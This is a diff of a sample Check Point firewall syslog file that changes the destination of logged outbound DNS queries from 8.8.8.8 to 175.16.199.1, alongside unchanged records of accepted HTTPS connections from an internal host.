-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35828"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59092"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35828"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59092"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53336"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:22:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e782,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.169"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51744"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38746"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56863"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46787"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55207"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39079"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48206"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52081"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53647"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49486"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56863"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46787"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55207"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39079"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48206"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52081"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53647"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49486"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53342"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55430"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38497"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55430"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38497"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54612"; service:"443"; service_id:"https"; src:"192.168.2.2"]
